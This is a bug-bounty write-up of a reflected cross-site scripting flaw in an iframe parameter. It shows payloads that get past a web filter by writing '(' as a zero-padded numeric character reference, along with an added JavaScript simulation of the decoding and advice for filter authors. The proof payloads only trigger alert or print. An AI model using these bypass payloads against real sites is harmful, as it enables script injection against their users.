Hi incredible hackers. I got a private invite, and got curious about the program, so I signed up into the main website and started clicking around and using all functions.
I found an endpoint in which the value of the “name” parameter was reflected inside an “iframe” tag.
" character wasn’t being encoded, so I was able to get out of the
The ( and ` characters were not allowed and caused a 403 error:
test" onload=alert(origin) --> 403
test" onload=print`` --> 403
test" onload=alert origin) --> 200
I played with it for a few minutes, but I couldn’t exploit it.
I texted my buddy 0xrz, who is a true monster when it comes to hacking.
I sent him the endpoint and…
" onload=alert(origin) value="
He told me what was going on, and I’m writing it down here.
- The HTML parser decodes numeric character references in attribute values before the JavaScript engine ever sees the handler, so inside the onload attribute the decimal reference &#40; can be written in place of ( and it still runs as alert(origin). Check the code points here: http://www.endmemo.com/unicode/ascii.php.
But this payload was giving us a 403 page again, so on its own it wasn’t a bypass.
- The HTML spec allows any number of leading zeroes between &# and the digits, so something like &#0000040; is still decoded to ( by the browser, while the filter that was matching &#40; never saw it. Isn’t that amazing?
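To make the decoding step concrete, here is an added example (my own code, not from the original post or from 0xrz) that implements the numeric-character-reference rule of the HTML tokenizer for an attribute value and puts a naive filter in front of it. The filter rule is an assumption modelled on the behaviour described above (the real WAF rule set is unknown); the hex form &#x00028; is included to show that the same leading-zero trick applies to hex references, which the post does not cover.

```javascript
// Added example, not code from the original post: how an HTML parser turns
// numeric character references in an attribute value into characters, and why
// a filter that matches the literal "(" or the spelling "&#40;" misses "&#0000040;".
// Simplified decoder: only decimal/hex numeric references, no named entities.

// &#DDD; or &#xHHH; -- any number of leading zeros, trailing ";" optional.
const NUMERIC_REF = /&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?/g;

// Decode numeric character references the way the HTML tokenizer does for an
// attribute value. This happens BEFORE the JS engine sees the handler source,
// which is why "alert&#0000040;origin)" executes as alert(origin).
function decodeNumericRefs(attrValue) {
  return attrValue.replace(NUMERIC_REF, (match, hex, dec) => {
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    if (cp === 0 || cp > 0x10ffff) return '\uFFFD'; // parser substitutes U+FFFD
    return String.fromCodePoint(cp);
  });
}

// Assumed filter rule (not the program's real WAF): block the literal "(" and "`"
// and the obvious entity spellings, which matches the 403s seen in the post.
function naiveFilterBlocks(raw) {
  return /[(`]/.test(raw) || /&#40;|&#x28;|&#96;|&#x60;/i.test(raw);
}

// Request value -> filter decision -> what the browser would actually execute.
function simulate(rawParam) {
  const blocked = naiveFilterBlocks(rawParam);
  return { blocked, executed: blocked ? null : decodeNumericRefs(rawParam) };
}

// Constructed sample payloads for the onload attribute value.
const cases = [
  'alert(origin)',          // literal "(" -> blocked
  'alert&#40;origin)',      // plain decimal reference -> blocked
  'alert&#0000040;origin)', // leading zeros -> passes, browser runs alert(origin)
  'alert&#x00028;origin)',  // hex with leading zeros -> same outcome (assumed)
];

for (const c of cases) {
  const r = simulate(c);
  console.log(`${c.padEnd(26)} blocked=${r.blocked} executes=${r.executed}`);
}
```

The point to take from the simulation is that the filter and the browser are parsing two different strings: the filter sees the raw bytes of the request, the browser sees the attribute value after character-reference decoding. A filter that wants to catch this has to canonicalise the same way the HTML parser does (decode numeric references, leading zeros and all, and hex as well as decimal) before matching, or it will always be one spelling behind.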
Report & Bounty:
Make sure that you follow 0xrz:
Reach me at: